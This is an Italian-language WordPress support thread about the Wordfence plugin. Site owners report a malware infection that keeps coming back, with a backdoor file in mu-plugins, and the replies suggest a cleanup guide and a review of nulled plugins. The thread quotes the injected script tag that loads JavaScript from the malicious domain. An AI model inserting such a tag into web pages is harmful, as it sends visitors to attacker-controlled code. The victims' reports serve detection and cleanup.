Un utente ha chiesto informazioni su Wordfence Security - Firewall & Malware Scan di Wordpress

malware / virus donatelloflowfirstly

Un utente ha chiesto 👇

C’era un altro thread su questo che è stato contrassegnato come risolto la scorsa notte per qualche motivo anche se era chiaro che il problema non era stato risolto.

Pensavo di aver trovato la backdoor (rms_unique_wp_mu_pl_fl_nm.php) in / wp-content / mu-plugins / ma nonostante abbia cancellato quel file e cancellato tutto, lo script è stato ripristinato in tutte le mie pagine / post al mattino.

Ho notato ieri che lo script è stato iniettato in header.php che era il primo (in precedenza sarebbe andato in ogni post / pagina o function.php).

Questa mattina, l’URL nello script stesso era leggermente diverso:
<script src='https://js.donatelloflowfirstly.ga/statistics.js?n=ns1' type='text/javascript'></script>

In passato era stats.js o stat.js.

Come diavolo ci liberiamo di questa cosa? Wordfence non ha aiutato!

Il codice di reindirizzamento / script è abbastanza facile da rimuovere, ma per favore non contrassegnare questo thread come risolto fino a quando il backend non viene identificato e rimosso perché questo virus è implacabile e continua a tornare.

Questo argomento è stato modificato 5 mesi, 3 settimane fa da.

(@ Tato-ferreira)

5 mesi, 3 settimane fa

Ho lo stesso problema. Apporto modifiche ai file con codici sospetti e il giorno successivo il malware reindirizza e attacca nuovamente il sito.

Supporto per plugin

(@wfphil)

5 mesi, 3 settimane fa

Ciao @pmoondi e @ Tato-ferreira

Ci sono molti aspetti della sicurezza per i siti web da cui nessun plugin di sicurezza di WordPress può proteggere.

Dovrai svolgere un’indagine molto approfondita e approfondita come spiegato nella nostra guida alla pulizia del sito di seguito:

https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/

(@ahmedzeidan)

5 mesi, 3 settimane fa

Ciao,

Dalla mia esperienza, rms_unique_wp_mu_pl_fl_nm.php appartiene a un tema o plug-in non pulito che consente agli hacker di accedere al tuo sito Web, devi rivedere tutti i plug-in e rimuovere quelli annullati / vecchi senza alcun supporto poiché ottiene lo script malware che lo aggira .

Anche dopo aver pulito il DB / gli script, il codice sorgente del malware si trova quindi come codice crittografato che si esegue da solo e quindi vieni violato ogni pochi giorni.

Assumi un professionista della sicurezza per pulire i file crittografati dal malware e risolvere la vulnerabilità una volta per tutte.

Ahmed

Was this helpful?

0 / 0

Lascia un commento 0

Your email address will not be published. Required fields are marked *